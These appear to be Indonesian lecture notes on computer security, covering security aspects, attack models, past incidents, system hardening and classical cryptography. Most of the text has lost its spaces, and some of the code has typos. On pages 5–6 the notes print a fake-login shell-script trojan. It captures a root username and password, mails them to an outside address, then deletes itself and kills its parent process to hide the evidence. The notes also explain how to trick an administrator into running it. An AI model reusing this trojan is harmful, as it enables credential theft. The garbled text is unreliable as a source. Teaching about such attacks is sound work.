KeamananKomputer DIKTATKULIAHKEAMANANKOMPUTER

PENDAHULUAN
Carabelajar:

Caribukubukumengenaikeamanankomputercetakan,ebook,majalahmajalah/tabloid komputeredisicetakmaupunedisionline. Akseskesitussitusreviewkeamanan(contoh:www.cert.org),situssitusunderground (silahkancariviasearchengine). Pelajarireviewataumanualbookperangkatkerasdanperangkatlunakuntukmemahami carakerjadenganbaik.

KeamananKomputerMengapadibutuhkan?

informationbasedsociety,menyebabkannilaiinformasimenjadisangatpentingdan menuntutkemampuanuntukmengaksesdanmenyediakaninformasisecaracepatdan akuratmenjadisangatesensialbagisebuahorganisasi, InfrastrukturJaringankomputer,sepertiLANdanInternet,memungkinkanuntuk menyediakaninformasisecaracepat,sekaligusmembukapotensiadanyalubang keamanan(securityhole)

KejahatanKomputersemakinmeningkatkarena: AplikasibisnisberbasisTIdanjaringankomputermeningkat:onlinebanking,e commerce,ElectronicdataInterchange(EDI). Desentralisasiserver. Transisidarisinglevendorkemultivendor. Meningkatnyakemampuanpemakai(user). Kesulitanpenegakhokumdanbelumadanyaketentuanyangpasti. Semakinkompleksnyasystemyangdigunakan,semakinbesarnyasourcecode programyangdigunakan. Berhubungandenganinternet.

Hal:1

KeamananKomputer KlasifikasikejahatanKomputer: Levelannoying

LevelDangerous

MenurutDavidIcove[JohnD.Howard,AnAnalysisOfSecurityIncidentsOnTheInternet1989 1995,PhDthesis,EngineeringandPublicPolicy,CarnegieMellonUniversity,1997.] berdasarkanlubangkeamanan,keamanandapat diklasifikasikanmenjadiempat,yaitu: 1. Keamananyangbersifatfisik(physicalsecurity):termasukaksesorangkegedung, peralatan,danmediayangdigunakan.Contoh: Wiretappingatauhalhalyangberhubungandenganakseskekabelatau komputeryangdigunakanjugadapatdimasukkankedalamkelasini. Denialofservice,dilakukanmisalnyadenganmematikanperalatanatau membanjirisalurankomunikasidenganpesanpesan(yangdapatberisiapasaja karenayangdiutamakanadalahbanyaknyajumlahpesan). SynFloodAttack,dimanasistem(host)yangditujudibanjiriolehpermintaan sehinggadiamenjaditerlalusibukdanbahkandapatberakibatmacetnyasistem (hang). 2. Keamananyangberhubungandenganorang(personel),Contoh: Identifikasiuser(usernamedanpassword) Profilresikodariorangyangmempunyaiakses(pemakaidanpengelola). 3. Keamanandaridatadanmediasertateknikkomunikasi(communications). 4. Keamanandalamoperasi:Adanyaproseduryangdigunakanuntukmengaturdan mengelolasistemkeamanan,danjugatermasukprosedursetelahserangan(post attackrecovery).

Karakteristik Penyusup :
1. The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki. 2. The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali pulih. 3. The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya. 4. The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya.

Hal:2

KeamananKomputer
Istilah bagi penyusup : 1. Mundane ; tahu mengenai hacking tapi tidak mengetahui metode dan prosesnya. 2. lamer (script kiddies) ; mencoba script2 yang pernah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya. 3. wannabe ; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION. 4. larva (newbie) ; hacker pemula, teknik hacking mulai dikuasai dengan baik, sering bereksperimen. 5. hacker ; aktivitas hacking sebagai profesi. 6. wizard ; hacker yang membuat komunitas pembelajaran di antara mereka. 7. guru ; master of the master hacker, lebih mengarah ke penciptaan tools-tools yang powerfull yang salah satunya dapat menunjang aktivitas hacking, namun lebih jadi tools pemrograman system yang umum. ASPEKKEAMANANKOMPUTER: MenurutGarfinkel[SimsonGarfinkel,PGP:PrettyGoodPrivacy,OReilly&Associates,Inc., 1995.] 1.Privacy/Confidentiality Defenisi:menjagainformasidariorangyangtidakberhakmengakses. Privacy:lebihkearahdatadatayangsifatnyaprivat,Contoh:emailseorangpemakai (user)tidakbolehdibacaolehadministrator. Confidentiality :berhubungandengandatayangdiberikankepihaklainuntuk keperluantertentudanhanyadiperbolehkanuntukkeperluantertentutersebut. Contoh:datadatayangsifatnyapribadi(sepertinama,tempattanggallahir,social securitynumber,agama,statusperkawinan,penyakityangpernahdiderita,nomorkartu kredit,dansebagainya)harusdapatdiproteksidalampenggunaandanpenyebarannya. BentukSerangan:usahapenyadapan(denganprogramsniffer). Usahausahayangdapatdilakukanuntukmeningkatkanprivacydanconfidentialityadalah denganmenggunakanteknologikriptografi. 2.Integrity Defenisi:informasitidakbolehdiubahtanpaseijinpemilikinformasi. Contoh:emaildiinterceptditengahjalan,diubahisinya,kemudianditeruskankealamat yangdituju. Bentukserangan:Adanyavirus,trojanhorse,ataupemakailainyangmengubahinformasi tanpaijin,maninthemiddleattackdimanaseseorangmenempatkandiriditengah pembicaraandanmenyamarsebagaioranglain. 3.Authentication Defenisi:metodauntukmenyatakanbahwainformasibetulbetulasli,atauorangyang mengaksesataumemberikaninformasiadalahbetulbetulorangyangdimaksud. Dukungan:

Hal:3

KeamananKomputer

AdanyaToolsmembuktikankeasliandokumen,dapatdilakukandenganteknologi watermarking(untukmenjagaintellectualproperty,yaitudenganmenandai dokumenatauhasilkaryadengantandatanganpembuat)dandigitalsignature. Accesscontrol,yaituberkaitandenganpembatasanorangyangdapatmengakses informasi.Userharusmenggunakanpassword,biometric(ciricirikhasorang),dan sejenisnya.

4.Availability Defenisi:berhubungandenganketersediaaninformasiketikadibutuhkan. Contohhambatan: denialofserviceattack(DoSattack),dimanaserverdikirimipermintaan(biasanya palsu)yangbertubitubiataupermintaanyangdiluarperkiraansehinggatidakdapat melayanipermintaanlainataubahkansampaidown,hang,crash. mailbomb,dimanaseorangpemakaidikirimiemailbertubitubi(katakanribuane mail)denganukuranyangbesarsehinggasangpemakaitidakdapatmembukae mailnyaataukesulitanmengaksesemailnya. 5.AccessControl Defenisi:carapengaturanakseskepadainformasi.berhubungandenganmasalah authenticationdanjugaprivacy Metode:menggunakankombinasiuserid/passwordataudengan menggunakanmekanismelain. 6.Nonrepudiation Defenisi:Aspekinimenjagaagarseseorangtidakdapatmenyangkaltelahmelakukan sebuahtransaksi.Dukunganbagielectroniccommerce. SECURITYATTACKMODELS MenurutW.Stallings[WilliamStallings,NetworkandInternetworkSecurity,Prentice Hall,1995.]serangan(attack)terdiridari: Interruption:Perangkatsistemmenjadirusakatautidaktersedia.Seranganditujukan kepadaketersediaan(availability)darisistem.Contohseranganadalahdenialofservice attack. Interception:Pihakyangtidakberwenangberhasilmengaksesassetatauinformasi. Contohdariseranganiniadalahpenyadapan(wiretapping). Modification:Pihakyangtidakberwenangtidaksajaberhasilmengakses,akantetapi dapatjugamengubah(tamper)aset.Contohdariseranganiniantaralainadalahmengubah isidariwebsitedenganpesanpesanyangmerugikanpemilikwebsite. Fabrication:Pihakyangtidakberwenangmenyisipkanobjekpalsukedalamsistem. Contohdariseranganjenisiniadalahmemasukkanpesanpesanpalsusepertiemailpalsu kedalamjaringankomputer.

SECURITYBREACHACCIDENT 1996 U.S.FederalComputerIncidentResponseCapability(FedCIRC)

melaporkanbahwalebihdari2500insidendisystemkomputeratau

Hal:4

KeamananKomputer
jaringankomputeryangdisebabkanolehgagalnyasistemkeamananatau adanyausahauntukmembobolsistemkeamanan 1996 FBINationalComputerCrimesSquad,WashingtonD.C.,memperkirakan kejahatankomputeryangterdeteksikurangdari15%,danhanya10% dariangkaituyangdilaporkan 1997 PenelitianDeloitteTouchTohmatsumenunjukkanbahwadari300 perusahaandiAustralia,37%(duadiantaralima)pernahmengalami masalahkeamanansistemkomputernya. 1996 Inggris,NCCInformationSecurityBreachesSurveymenunjukkanbahwa kejahatankomputermenaik200%daritahun1995ke1996.Kerugian ratarataUS$30.000/insiden. 1998 FBImelaporkanbahwakasuspersidanganyangberhubungan dengankejahatankomputermeroket950%daritahun1996ke tahun1997,denganpenangkapandari4ke42,danterbukti (convicted)dipengadilannaik88%dari16ke30kasus. Danlainlain.Dapatdilihatdiwww.cert.org Contohakibatdarijebolnyasistemkeamanan,antaralain: 1988 KeamanansistemmailsendmaildieksploitasiolehRobert TapanMorrissehinggamelumpuhkansistemInternet.Kegiatan inidapatdiklasifikasikansebagaidenialofserviceattack. Diperkirakanbiayayangdigunakanuntukmemperbaikidanhalhallain yanghilangadalahsekitar$100juta.Ditahun1990Morris dihukum(convicted)danhanyadidenda$10.000. 10Maret1997 SeoranghackerdariMassachusettsberhasilmematikansistem telekomunikasidisebuahairportlocal(Worcester,Massachusetts) sehinggamematikankomunikasidicontroltowerdanmenghalau pesawatyanghendakmendarat. DiajugamengacaukansistemtelepondiRutland,Massachusetts. http://www.news.com/News/Item/Textonly/0,25,20278,00.html?pfv 1990 KevinPoulsenmengambilalihsystemkomputertelekomunikasidiLos Angelesuntukmemenangkankuisdisebuahradiolocal. 1995 KevinMitnick,mencuri20.000nomorkartukredit,menyalinsystem operasiDECsecaraillegaldanmengambilalihhubungantelpondiNew YorkdanCalifornia. 1995 VladimirLevinmembobolbankbankdikawasanWallstreet, mengambiluangsebesar$10juta. 2000 FabianClonemenjebolsitusaetna.co.iddanJakartamaildanmembuat directoryatasnamanyaberisiperingatanterhadapadministratorsitus tersebut. 2000 BeberapawebsiteIndonesiasudahdijeboldandaftarnya(beserta contohhalamanyangsudahdijebol)dapatdilihatdikoleksi <http://www.2600.com> 2000 Wenas,membuatserversebuahISPdisingapuradown

MEMAHAMIHACKERBEKERJA Secaraumummelaluitahapantahapansebagaiberikut: 1. Tahapmencaritahusystemkomputersasaran. 2. Tahappenyusupan 3. Tahappenjelajahan 4. Tahapkeluardanmenghilangkanjejak.

Hal:5

KeamananKomputer
ContohkasusTrojanHouse,memanfaatkanSHELLscriptUNIX: SeoranggadiscantikdangenitpesertakuliahUNIXdisebuahperguruantinggimemiliki potensimemancingpengelolasistemkomputer(administratorpemegangaccountroot... hmmm)yanglengah.IamelaporkanbahwakomputertempatiamelakukantugastugasUNIX yangdiberikantidakdapatdipergunakan.Sangpengelolasistemkomputertentusajadengan gagahperkasainginmenunjukkankekuasaansebagaiadministratorUNIX. "Well,inisoalkecil.Mungkinpasswordkamukeblokir,biarsayaperbaikidaritempatkamu", ujaradministratorUNIXsombongsambildudukdisebelahgadiscantikdangenitpesertakuliah tersebut. Keesokanharinya,terjadilahkekacauandisistemUNIXkarenadidugaterjadipenyusupanoleh hackertermasukjugahompepageperguruantinggitersebutdiobokobok,maklum pengelolanyamasihsama.Selanjutnyapihakperguruantinggimengeluarkanpressrelease bahwahomepagemerekadijebololehhackerdariLuarNegeri....hihiii Nahsebenarnyaapasihyangterjadi? Sederhana,gadiscantikdangenitpesertakuliahUNIXtersebutmenggunakanprogramkecil my_logindalambentukshellscriptyangmenyerupailayarlogindanpasswordsistemUNIX sebagaiberikut:
#!/bin/sh ################################### #Namaprogram:my_login #Deskripsi:Programkudatrojansederhana #versi1.0Nopember1999 #################################### COUNTER=0 Cat/etc/issue While["$COUNTER"ne2] do letCOUNTER=$COIUNTER+1 echo"login:\c" readLOGIN sttyecho echo"password:\c" readPASSWORD echo"User$LOGIN:$PASSWORD"|mailgadis@company.com sttyecho echo echo"LoginIncorrect" done rm$0 kill9$PPID

Apabilaprograminidijalankanmakaakanditampilkanlayarloginsepertilayaknyaawal penggunaankomputerpdaasistemUNIX:
Login: Password:

Lihatlah,AdministratorUNIXyanggagahperkasatadiyangtidakmelihatgadistersebut menjalankanprograminitentunyatidaksadarbahwainimerupakanlayartipuan.Layarlogin initidakterlihatbedadibandinglayarloginsesungguhnya. Sepertipadaprogramloginsesungguhnya,sistemkomputerakanmemintapemakaiuntuk loginkedalamsistem.Setelahdiisipassworddandienter,makasegeratimbulpesan

Hal:6

KeamananKomputer
Login:root Password:******** LoginIncorrect

TentusajaAdministratorUNIXakankagetbahwapasswordnyaternyata(seolaholah)salah. Untukituiasegeramengulangilogindanpassword.Setelahduakaliiamencobalogindan tidakberhasil,makaloginnyadibatalkandankembalikeluarUNIX. Perhatikanprogramdiatasbaikbaik,sekalipemakaitersebutmencobalogindanmengisi passwordpadalayardiatas,setelahitumakaotomatisdatalogindanpasswordtersebutakan diemailkemailto:hacker@company.com.Sampaidisinimakasigadislugudangenittelah mendapatkanlogindanpassword...iaternyataseoranghacker!! Walaupunsederhana,jikakitaperhatikanlebihjauhlagi,makaprograminijugamemiliki beberapatrikhackerlainnya,yaituprosespenghilanganjejak(masihingattahapanhacker yangditulisdiatas?).Prosesinidilakukanpada2baristerakhirdariprogrammy_logindiatas, yaitu
rm$0 kill9$PPID

yangartinyaakansegeradilakukanprosespenghapusanprogrammy_logindanhapuspulaID dariproses.Dengandemikianhilanglahprogramtersebutyangtentunyajugamenhilangkan barangbukti.DitambahlagipenghapusanterhadapjejakprosesdidalamsistemUNIX.Zap... hilangsudahtandatandabahwahackernyaternyataseoranggadispesertakuliahnya. Suksesdariprograminisebenarnyasangattergantungdaribagaimanaagaraplikasiinidapat dieksekusiolehroot.Hackeryangbaikmemangharusberusahamemancingagarpemilikroot menjalankanprogramini. PRINSIPDASARPERANCANGANSISTEMYANGAMAN

1. Mencegahhilangnyadata 2. Mencegahmasuknyapenyusup LAPISANKEAMANAN: 1.LapisanFisik: membatasiaksesfisikkemesin: o Aksesmasukkeruangankomputer o pengunciankomputersecarahardware o keamananBIOS o keamananBootloader backupdata: o pemilihanpirantibackup o penjadwalanbackup mendeteksigangguanfisik: logfile:Logpendekatautidaklengkap,Logyangberisikanwaktuyanganeh,Log denganpermisiataukepemilikanyangtidaktepat,Catatanpelayananrebootatau restart,Logyanghilang,masukansuataulogindaritempatyangjanggal mengontrolaksessumberdaya. 2.Keamananlokal

Berkaitandenganuserdanhakhaknya: Hal:7

KeamananKomputer

Berimerekafasilitasminimalyangdiperlukan. Hatihatiterhadapsaat/darimanamerekalogin,atautempatseharusnyamereka login. Pastikandanhapusrekeningmerekaketikamerekatidaklagimembutuhkanakses.

3.KeamananRoot Ketikamelakukanperintahyangkompleks,cobalahdalamcarayangtidakmerusak dulu,terutamaperintahyangmenggunakanglobbing:contoh,andainginmelakukan "rmfoo*.bak",pertamacobadulu:"lsfoo*.bak"danpastikanandainginmenghapus filefileyangandapikirkan. Beberapaorangmerasaterbantuketikamelakukan"touch/i"padasistemmereka. Haliniakanmembuatperintahperintahseperti:"rmfr*"menanyakanapakahanda benarbenaringinmenghapusseluruhfile.(Shellandamenguraikan"i"dulu,dan memberlakukannyasebagaioptionikerm). Hanyamenjadirootketikamelakukantugastunggaltertentu.Jikaandaberusaha mengetahuibagaimanamelakukansesuatu,kembalikeshellpemakainormalhingga andayakinapayangperludilakukanolehroot. Jalurperintahuntukpemakairootsangatpenting.Jalurperintah,atauvariabel lingkunganPATHmendefinisikanlokalyangdicarishelluntukprogram.Cobalahdan batasijalurperintahbagipemakairootsedapatmungkin,danjanganpernah menggunakan'.',yangberarti'direktorisaatini',dalampernyataanPATHanda. Sebagaitambahan,janganpernahmenaruhdirektoriyangdapatditulispadajalur pencariananda,karenahalinimemungkinkanpenyerangmemodifikasiataumenaruh filebinerdalamjalurpencariananda,yangmemungkinkanmerekamenjadirootketika andamenjalankanperintahtersebut. Janganpernahmenggunakanseperangkatutilitasrlogin/rsh/rexec(disebututilitasr) sebagairoot.Merekamenjadisasaranbanyakserangan,dansangatberbahayabila dijalankansebagairoot.Janganmembuatfile.rhostsuntukroot. File/etc/securettyberisikandaftarterminalterminaltempatrootdapatlogin.Secara baku(padaRedHatLinux)disethanyapadakonsolvirtuallokal(vty).Berhatihatilah saatmenambahkanyanglainkefileini.Andaseharusnyalogindarijarakjauhsebagai pemakaibiasadankemudian'su'jikaandabutuh(mudahmudahanmelaluisshatau saluranterenkripsilain),sehinggatidakperluuntukloginsecaralangsungsebagairoot. Selaluperlahandanberhatihatiketikamenjadiroot.Tindakanandadapat mempengaruhibanyakhal.Pikirsebelumandamengetik! 4.KeamananFiledansystemfile Directoryhomeusertidakbolehmengaksesperintahmengubahsystemsepertipartisi, perubahandevicedanlainlain. Lakukansettinglimitsystemfile. Aturaksesdanpermissionfile:read,writa,executebagiusermaupungroup. Selalucekprogramprogramyangtidakdikenal 5.KeamananPassworddanEnkripsi Hatihatiterhadapbrutoforceattackdenganmembuatpasswordyangbaik. Selalumengenkripsifileyangdipertukarkan. Lakukanpengamananpadaleveltampilan,sepertiscreensaver. 6.KeamananKernel selaluupdatekernelsystemoperasi. Ikutireviewbugsdankekurangkekuranganpadasystemoperasi. 7.KeamananJaringan WaspadaipaketsnifferyangseringmenyadapportEthernet.

Hal:8

KeamananKomputer

Lakukanproseduruntukmengecekintegritasdata VerifikasiinformasiDNS Lindunginetworkfilesystem Gunakanfirewalluntukbarrierantarajaringanprivatdenganjaringaneksternal

KRIPTOGRAFI
DEFENISI
Cryptographyadalahsuatuilmuataupunsenimengamankanpesan,dandilakukanolehcryptographer. Cryptanalysisadalahsuatuilmudansenimembuka(breaking)ciphertextdanorangyangmelakukannya disebutcryptanalyst.

ELEMEN

CRYPTOSYSTEM
Cryptographicsystemataucryptosystemadalahsuatufasilitasuntukmengkonversikanplaintextke ciphertextdansebaliknya.Dalamsistemini,seperangkatparameteryangmenentukantransformasi pencipherantertentudisebutsuatusetkunci.Prosesenkripsidandekripsidiaturolehsatuatau beberapakuncikriptografi.

1.Kriptografidapatmemenuhikebutuhanumumsuatutransaksi: 1. Kerahasiaan(confidentiality)dijamindenganmelakukanenkripsi(penyandian). 2. Keutuhan(integrity)atasdatadatapembayarandilakukandenganfungsihash satuarah. 3. Jaminanatasidentitasdankeabsahan(authenticity)pihakpihakyang melakukantransaksidilakukandenganmenggunakanpasswordatausertifikat digital.Sedangkankeotentikandatatransaksidapatdilakukandengantanda tangandigital. 4. Transaksidapatdijadikanbarangbuktiyangtidakbisadisangkal(non repudiation)denganmemanfaatkantandatangandigitaldansertifikatdigital. 2.Karakteristikcryptosytemyangbaiksebagaiberikut: 1. Keamanansistemterletakpadakerahasiaankuncidanbukanpadakerahasiaan algoritmayangdigunakan. 2. Cryptosystemyangbaikmemilikiruangkunci(keyspace)yangbesar. 3. Cryptosystemyangbaikakanmenghasilkanciphertextyangterlihatacakdalam seluruhtesstatistikyangdilakukanterhadapnya. 4. Cryptosystemyangbaikmampumenahanseluruhseranganyangtelahdikenal sebelumnya

Hal:9

KeamananKomputer
3.MACAMCRYPTOSYSTEM A.SymmetricCryptosystem Dalamsymmetriccryptosystemini,kunciyangdigunakanuntukprosesenkripsidandekripsi padaprinsipnyaidentik,tetapisatubuahkuncidapatpuladiturunkandarikunciyanglainnya. Kuncikunciiniharusdirahasiakan.Olehkarenaitulahsisteminiseringdisebutsebagaisecret keyciphersystem.Jumlahkunciyangdibutuhkanumumnyaadalah: nC2=n.(n1) 2 dengannmenyatakanbanyaknyapengguna. ContohdarisisteminiadalahDataEncryptionStandard(DES),Blowfish,IDEA. B.AssymmetricCryptosystem Dalamassymmetriccryptosysteminidigunakanduabuahkunci.Satukunciyangdisebutkunci publik(publickey)dapatdipublikasikan,sedangkunciyanglainyangdisebutkunciprivat (privatekey)harusdirahasiakan.Prosesmenggunakansisteminidapatditerangkansecara sederhanasebagaiberikut:bilaAinginmengirimkanpesankepadaB,Adapatmenyandikan pesannyadenganmenggunakankuncipublikB,danbilaBinginmembacasurattersebut,ia perlumendekripsikansuratitudengankunciprivatnya.Dengandemikiankeduabelahpihak dapatmenjaminasalsuratsertakeasliansurattersebut,karenaadanyamekanismeini.Contoh sisteminiantaralainRSASchemedanMerkleHellmanScheme. 4.PROTOKOLCRYPTOSYSTEM
Cryptographicprotocoladalahsuatuprotokolyangmenggunakankriptografi.Protokolinimelibatkan sejumlahalgoritmakriptografi,namunsecaraumumtujuanprotokollebihdarisekedarkerahasiaan. Pihakpihakyangberpartisipasimungkinsajainginmembagisebagianrahasianyauntukmenghitung sebuahnilai,menghasilkanurutanrandom,ataupunmenandatanganikontraksecarabersamaan. Penggunaankriptografidalamsebuahprotokolterutamaditujukanuntukmencegahataupun mendeteksiadanyaeavesdroppingdancheating.

5.JENISPENYERANGANPADAPROTOKOL Ciphertextonlyattack.Dalampenyeranganini,seorangcryptanalystmemiliki ciphertextdarisejumlahpesanyangseluruhnyatelahdienkripsimenggunakan algoritmayangsama. Knownplaintextattack.Dalamtipepenyeranganini,cryptanalystmemilikiaksestidak hanyakeciphertextsejumlahpesan,namuniajugamemilikiplaintextpesanpesan tersebut. Chosenplaintextattack.Padapenyeranganini,cryptanalysttidakhanyamemiliki aksesatasciphertextdanplaintextuntukbeberapapesan,tetapiiajugadapatmemilih plaintextyangdienkripsi. Adaptivechosenplaintextattack.Penyerangantipeinimerupakansuatukasuskhusus chosenplaintextattack.Cryptanalysttidakhanyadapatmemilihplaintextyang dienkripsi,iapunmemilikikemampuanuntukmemodifikasipilihanberdasarkanhasil enkripsisebelumnya.Dalamchosenplaintextattack,cryptanalystmungkinhanya dapatmemilikiplaintextdalamsuatublokbesaruntukdienkripsi;dalamadaptive chosenplaintextattackiniiadapatmemilihblokplaintextyanglebihkecildan

Hal:10

KeamananKomputer
kemudianmemilihyanglainberdasarkanhasilyangpertama,prosesinidapat dilakukannyaterusmenerushinggaiadapatmemperolehseluruhinformasi. Chosenciphertextattack.Padatipeini,cryptanalystdapatmemilihciphertextyang berbedauntukdidekripsidanmemilikiaksesatasplaintextyangdidekripsi. Chosenkeyattack.Cryptanalystpadatipepenyeranganinimemilikipengetahuan tentanghubunganantarakuncikunciyangberbeda. Rubberhosecryptanalysis.Padatipepenyeranganini,cryptanalystmengancam, memeras,ataubahkanmemaksaseseoranghinggamerekamemberikankuncinya.

6.JENISPENYERANGANPADAJALURKOMUNIKASI Sniffing:secaraharafiahberartimengendus,tentunyadalamhaliniyangdiendus adalahpesan(baikyangbelumataupunsudahdienkripsi)dalamsuatusaluran komunikasi.Haliniumumterjadipadasaluranpublikyangtidakaman.Sang pengendusdapatmerekampembicaraanyangterjadi. Replayattack[DHMM96]:Jikaseseorangbisamerekampesanpesanhandshake (persiapankomunikasi),iamungkindapatmengulangpesanpesanyangtelah direkamnyauntukmenipusalahsatupihak. Spoofing[DHMM96]:PenyerangmisalnyaMamanbisamenyamarmenjadiAnto. SemuaorangdibuatpercayabahwaMamanadalahAnto.Penyerangberusaha meyakinkanpihakpihaklainbahwatakadasalahdengankomunikasiyangdilakukan, padahalkomunikasiitudilakukandengansangpenipu/penyerang.Contohnyajika orangmemasukkanPINkedalammesinATMpalsuyangbenarbenardibuatseperti ATMaslitentusangpenipubisamendapatkanPINnyadancopypitamagentikkartu ATMmiliksangnasabah.Pihakbanktidaktahubahwatelahterjadikejahatan. Maninthemiddle[Schn96]:Jikaspoofingterkadanghanyamenipusatupihak,maka dalamskenarioini,saatAntohendakberkomunikasidenganBadu,Mamandimata AntoseolaholahadalahBadu,danMamandapatpulamenipuBadusehinggaMaman seolaholahadalahAnto.Mamandapatberkuasapenuhatasjalurkomunikasini,dan bisamembuatberitafitnah. METODECRYPTOGRAFI 1.METODEKUNO a.475S.M.bangsaSparta,suatubangsamiliterpadajamanYunanikuno,menggunakanteknik kriptografiyangdisebutscytale,untukkepentinganperang.Scytaleterbuatdaritongkat denganpapyrusyangmengelilinginyasecaraspiral. Kuncidariscytaleadalahdiametertongkatyangdigunakanolehpengirimharussamadengan diametertongkatyangdimilikiolehpenerimapesan,sehinggapesanyangdisembunyikan dalampapyrusdapatdibacadandimengertiolehpenerima.

Hal:11

KeamananKomputer
b.JuliusCaesar,seorangkaisarterkenalRomawiyangmenaklukkanbanyakbangsadiEropa danTimurTengahjugamenggunakansuatuteknikkriptografiyangsekarangdisebutCaesar cipheruntukberkorespondensisekitartahun60S.M.TeknikyangdigunakanolehSangCaesar adalahmensubstitusikanalfabetsecaraberaturan,yaituolehalfabetketigayang mengikutinya,misalnya,alfabetA"digantikanoleh"D","B"oleh"E",danseterusnya.Sebagai contoh,suatupesanberikut:

Gambar2.CaesarCipher DenganaturanyangdibuatolehJuliusCaesartersebut,pesansebenarnyaadalah"Penjarakan panglimadivisiketujuhsegera". 2.TEKNIKDASARKRIPTOGRAFI a.Substitusi SalahsatucontohteknikiniadalahCaesarcipheryangtelahdicontohkandiatas.Langkah pertamaadalahmembuatsuatutabelsubstitusi.Tabelsubstitusidapatdibuatsesukahati, dengancatatanbahwapenerimapesanmemilikitabelyangsamauntukkeperluandekripsi. Bilatabelsubstitusidibuatsecaraacak,akansemakinsulitpemecahanciphertextolehorang yangtidakberhak.
ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890., BF1KQGATPJ6HYD2X5MV7C84I9NREU3LSW,.OZ0

Gambar3.TabelSubstitusi Tabelsubstitusidiatasdibuatsecaraacak.Denganmenggunakantabeltersebut,dariplaintext "5teknikdasarkriptografi"dihasilkanciphertext"L7Q6DP6KBVBM6MPX72AMBGP".Dengan menggunakantabelsubstitusiyangsamasecaradenganarahyangterbalik(reverse),plaintext dapatdiperolehkembalidariciphertextnya.

Hal:12

KeamananKomputer
b.Blocking Sistemenkripsiterkadangmembagiplaintextmenjadiblokblokyangterdiridaribeberapa karakteryangkemudiandienkripsikansecaraindependen.Plaintextyangdienkripsikandengan menggunakanteknikblockingadalah:
BLOK 1 BLOK 2 BLOK 3 BLOK 4 BLOK 5 BLOK 6 BLOK 7 Gambar4.EnkripsidenganBlocking

Denganmenggunakanenkripsiblockingdipilihjumlahlajurdankolomuntukpenulisanpesan. Jumlahlajurataukolommenjadikuncibagikriptografidenganteknikini.Plaintextdituliskan secaravertikalkebawahberurutanpadalajur,dandilanjutkanpadakolomberikutnyasampai seluruhnyatertulis.Ciphertextnyaadalahhasilpembacaanplaintextsecarahorizontal berurutansesuaidenganbloknya.Jadiciphertextyangdihasilkandenganteknikiniadalah"5K GKRTDRAEAIFKSPINATIRO".Plaintextdapatpuladitulissecarahorizontaldanciphertextnya adalahhasilpembacaansecaravertikal. c.Permutasi Salahsatuteknikenkripsiyangterpentingadalahpermutasiatauseringjugadisebut transposisi.Teknikinimemindahkanataumerotasikankarakterdenganaturantertentu. Prinsipnyaadalahberlawanandengantekniksubstitusi.Dalamtekniksubstitusi,karakter beradapadaposisiyangtetaptapiidentitasnyayangdiacak.Padateknikpermutasi,identitas karakternyatetap,namunposisinyayangdiacak.Sebelumdilakukanpermutasi,umumnya plaintextterlebihdahuludibagimenjadiblokblokdenganpanjangyangsama. Untukcontohdiatas,plaintextakandibagimenjadiblokblokyangterdiridari6karakter, denganaturanpermutasisebagaiberikut:

Gambar5.Permutasi

Denganmenggunakanaturandiatas,makaprosesenkripsidenganpermutasidariplaintext adalahsebagaiberikut:

Hal:13

KeamananKomputer

Gambar6.ProsesEnkripsidenganPermutasi

Ciphertextyangdihasilkandenganteknikpermutasiiniadalah"NETK5SKDAIIRKRAATGORP FI". d.Ekspansi Suatumetodesederhanauntukmengacakpesanadalahdenganmemelarkanpesanitudengan aturantertentu.Salahsatucontohpenggunaanteknikiniadalahdenganmeletakkanhuruf konsonanataubilanganganjilyangmenjadiawaldarisuatukatadiakhirkataitudan menambahkanakhiran"an".Bilasuatukatadimulaidenganhurufvokalataubilangangenap, ditambahkanakhiran"i".Prosesenkripsidengancaraekspansiterhadapplaintextterjadi sebagaiberikut:

Gambar7.EnkripsidenganEkspansi

Ciphertextnyaadalah"5ANEKNIKTANASARDANRIPTOGRAFIKAN".Aturanekspansidapat dibuatlebihkompleks.Terkadangteknikekspansidigabungkandengantekniklainnya,karena teknikinibilaberdirisendiriterlalumudahuntukdipecahkan. e.Pemampatan(Compaction) Mengurangipanjangpesanataujumlahbloknyaadalahcaralainuntukmenyembunyikanisi pesan.Contohsederhanainimenggunakancaramenghilangkansetiapkarakterketigasecara berurutan.Karakterkarakteryangdihilangkandisatukankembalidandisusulkansebagai "lampiran"daripesanutama,dengandiawaliolehsuatukarakterkhusus,dalamcontohini digunakan"&".Prosesyangterjadiuntukplaintextkitaadalah:

Hal:14

KeamananKomputer

Gambar8.EnkripsidenganPemampatan

Aturanpenghilangankarakterdankarakterkhususyangberfungsisebagaipemisahmenjadi dasaruntukprosesdekripsiciphertextmenjadiplaintextkembali. Denganmenggunakankelimateknikdasarkriptografidiatas,dapatdiciptakankombinasi teknikkriptografiyangamatbanyak,denganfaktoryangmembatasisematamatahanyalah kreativitasdanimajinasikita.Walaupunsekilasterlihatsederhana,kombinasiteknikdasar kriptografidapatmenghasilkanteknikkriptografiturunanyangcukupkompleks,danbeberapa teknikdasarkriptografimasihdigunakandalamteknikkriptografimodern. BERBAGAISOLUSIENKRIPSIMODERN 1. DataEncryptionStandard(DES) standarbagiUSAGovernment didukungANSIdanIETF popularuntukmetodesecretkey terdiridari:40bit,56bitdan3x56bit(TripleDES) 2. AdvancedEncryptionStandard(AES) untukmenggantikanDES(launchingakhir2001) menggunakanvariablelengthblockchipper keylength:128bit,192bit,256bit dapatditerapkanuntuksmartcard. 3. DigitalCertificateServer(DCS) verifikasiuntukdigitalsignature autentikasiuser menggunakanpublicdanprivatekey contoh:NetscapeCertificateServer 4. IPSecurity(IPSec) enkripsipublic/privatekey dirancangolehCISCOSystem menggunakanDES40bitdanauthentication builtinpadaprodukCISCO solusitepatuntukVirtualPrivateNetwork(VPN)danRemoteNetworkAccess 5. Kerberos solusiuntukuserauthentication

Hal:15

KeamananKomputer

